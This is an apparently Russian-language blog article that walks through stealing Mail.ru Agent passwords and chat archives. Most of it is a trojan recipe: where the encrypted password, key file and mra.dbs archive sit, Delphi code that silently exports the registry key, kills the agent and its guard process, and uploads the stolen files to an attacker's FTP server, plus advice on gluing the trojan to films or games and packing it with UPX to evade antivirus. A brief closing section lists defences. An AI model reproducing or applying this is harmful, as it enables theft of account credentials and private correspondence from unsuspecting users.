Сегодня я решил рассказать вам как же все таки получается так что из вашего аккаунта начинает рассылаться спам вашим друзьям или того хуже читают ваши переписки.

Во первых разберемся в устройстве mail.ru агента. И узнаем где находится пароль.Зайдем в реестр(Пуск -> Выполнить -> Regedit). Далее проследуем в раздел с агентом HKEY_CURRENT_USER\Software\Mail.Ru\Agent\magent_logins2\имя_вашей_учетной_записи. Что же мы здесь видим, а видим мы следующее в записи ####password находится пароль, но что то с ним не так, оно и понятно он ведь зашифровать. Но нас это не остановит, ведь мы знаем что файл с шифром лежит в директории C:\Documents and Settings\Имя_вашего_юзера\Application Data\Mra\Update\ver.txt.

Во вторых следуем к логам переписки. C:\Documents and Settings\Имя_вашего_юзера\Application Data\Mra\Base в нем мы видим файл с именем mra.dbs это и есть архив переписок.Если его выделить с включенным Агентом или Guardом повиснет Exporer, но нас это опять таки ни чуть не смущает.

В третьих разберем встроенную защиту. А защита у агента проста как портовая проститутка(надеюсь разработчики не обидятся за столь обидное сравнение) и состоит из двух частей шифрование пароля(как окажется позже бесполезное) и самозащита процессов magent.exe и GuardmailRu.exe (кстати сами процессы закрыть не составит труда). Которые и не дают нам доступа к необходимым файлам.

Часть вторая атака.

После того как мы разобрались из чего состоит агент и его «защита» можно приступить к написанию программы для похищения клиентских данных. Что должна уметь наша программа: 1. Экспортировать данные из реестра; 2. Отключать Mail.ru Agent и GuardmailRu; 3. Передача данных пользователя. 4. Запуск Mail.ru Agent.

1. Экспортировать данные из реестра.

FileName := C:/data.reg; // куда сохраним данные реестра
Key := HKEY_CURRENT_USER\Software\Mail.Ru; // что нам нужно в реестре
if ShellExecute(Handle, open, regedit.exe, //запускаем знакомый Regedit незаметно от пользователя
PChar(Format(/e «%s» «%s», [FileName, Key])),
», SW_SHOWDEFAULT) <= 32
then
RaiseLastWin32Error();

2. Отключаем Mail.ru Agent и GuardmailRu.

Для отключения нежелательных процессов применим функцию KillTask

function KillTask(ExeFileName: string): integer;
const
PROCESS_TERMINATE=$0001;
var
ContinueLoop: BOOL;
FSnapshotHandle: THandle;
FProcessEntry32: TProcessEntry32;
begin
result := 0;

FSnapshotHandle := CreateToolhelp32Snapshot
(TH32CS_SNAPPROCESS, 0);
FProcessEntry32.dwSize := Sizeof(FProcessEntry32);
ContinueLoop := Process32First(FSnapshotHandle,
FProcessEntry32);

while integer(ContinueLoop) <> 0 do
begin
if ((UpperCase(ExtractFileName(FProcessEntry32.szExeFile)) =
UpperCase(ExeFileName))
or (UpperCase(FProcessEntry32.szExeFile) =
UpperCase(ExeFileName))) then
Result := Integer(TerminateProcess(OpenProcess(
PROCESS_TERMINATE, BOOL(0),
FProcessEntry32.th32ProcessID), 0));
ContinueLoop := Process32Next(FSnapshotHandle,
FProcessEntry32);
end;
CloseHandle(FSnapshotHandle);
end;

И собственно ее вызываем KillTask(magent.exe);KillTask(GuardMailRu.exe);.

3. Передача данных пользователя.

А теперь рассмотрим как мы получим данные. Для этого сразу решим как будет удобнее. Лично я использовал FTP, но многие воспользовались бы Email(SMTP).

Для того чтобы переправить файлы по FTP нам понадобиться компонент IDFTP найти его можно если вы используете Delphi 7 в Indy Clients. Далее нам нужно его настроить для связи с сервером

IdFTP1.Host := Адрес сервера;//лучше использовать IP чтобы антивирус неругался
IdFTP1.Username := имя пользователя;
IdFTP1.Password := пароль;
IdFTP1.Connect(true);//подключаемся
IdFTP1.Put(c:\data.reg,'dd.reg ,true);//отправляем данные реестра
IdFTP1.Put(C:\Documents and Settings\+GetUserFromWindows+\Application Data\Mra\Update\ver.txt,'Update/ver.txt ,true);//отправляем файл ключа
IdFTP1.Put(C:\Documents and Settings\+GetUserFromWindows+\Application Data\Mra\Base\mra.dbs,'Base\mra.dbs ,true);// отправляем архив переписки

как вы могли заметить для определения имени пользователя Windows используется функция GetUserFromWindows.Вот ее листинг:

function GetUserFromWindows: string;
var
UserName : string;
UserNameLen : Dword;
begin
UserNameLen := 255;
SetLength(userName, UserNameLen);
if GetUserName(PChar(UserName), UserNameLen) then
Result := Copy(UserName,1,UserNameLen 1)
else
Result := »;
end;

4. Запуск Mail.ru Agent.

После того как данные отправились MAgent можно включить.

Делается это с помощью процедуры ShellExecute и выглядит так:

ShellExecute(0, open, C:\Program Files\Mail.Ru\Agent\magent.exe, nil, nil, SW_SHOWNORMAL);

P.S. В заключение хочу сказать что исходник публиковаться не будет и этот метод не претендует на первенство, а использован лишь для того чтобы показать уязвимость.

Часть третья засылаем шпиона.

Теперь когда у нас есть троян, можно его и испытать но как перекинуть файл трояна так чтобы не вызвать подозрения.

Вариант первый маскируем под SFX архив просто повторив его интерфейс, но нет если пользователь имеет достаточный уровень владения ПК то может заметить что что то неладно. Поэтому мы поступим хитрее и воспользуемся программой SuperGlue32. Просто склеим скажем какой нибуть фильм или файл с игрой и засылаем жертве. Но тут нужно знать что файлы скрепленные SuperGlue32 могут вызвать подозрение, так как антивирус сообщит пользователю о такой сцепке. Но тут к нам приходит программа UPX, прогоняем злосчастный файл и можно не беспокоиться.

Предположим жертва попалась на крючок и все необходимые файлы у нас. Но осталось разместить их по местам(о которых я говорил в первой части) и воспользоваться data.reg для занесения данных в реестр. Теперь можно и позабавится почитав переписку и почту. Получив доступ на другие ресурсы.

P.S. Старайтесь не использовать данный метод во вред. И просто уважайте таинство личной переписки.

Часть четвертая заключительная или боремся с безобразием

Теперь когда мы знаем как происходит взлом, можно и подумать о том как с этим бороться. Как вы могли заметить из прошлых статей защита у агента «надежная», а антивирусы просто спешат вам сообщить что вам прислали троян. Кстати когда я проверял сможет ли хоть один антивирус обнаружить или хотя бы заподозрить неладное, то обнаружил что есть антивирусы которые могут защитить, но ими ни кто не пользуется и как показали тесты таких 3 из 35. Причем известных антивирусов в списке нет.

1. Способ защиты он же самый простой и самый неудобный. Устанавливаем Kaspersky Internet Security и тупо блокируем все неизвестные программы которые пытаются выйти в интернет. Но тут же у не опытных пользователей ПК всплывает вопрос. Как понять что программа не левая?.

2. Найти программу способную запретить обращение к файлам и директориям всем кроме разрешенных приложений. Но такую программу нужно еще создать, я лично не встречал программ способных выборочно блокировать директории.

3. Глухо сидим в танке и не принимать файлы. Этот способ не работает. Есть несчитанное множество способов доставки вредоносного ПО и необязательно что вам понадобиться что то запускать. Это может оказаться Autorun.inf, либо просто сайт. Да именно так просто зайдя на страницу можно словить беду.

4. Последний метод самый действенный но требует невероятной силы воли и просто времени. Предположим вы программируете на Assembler(хы хы думаю уже догадались). Короче говоря все подозрительные файлы дизассемблировать. Но и тут есть огромный минус, скажем троян был прикреплен к видео файлу и повесу определить невозможно, или будете ли вы смотреть сколько весит исполняемый файл игры скачанной с торрента или взятой у друга.

P.S. Какой способ выбрать, выбирать вам, лично я практикую все в зависимости от ситуации.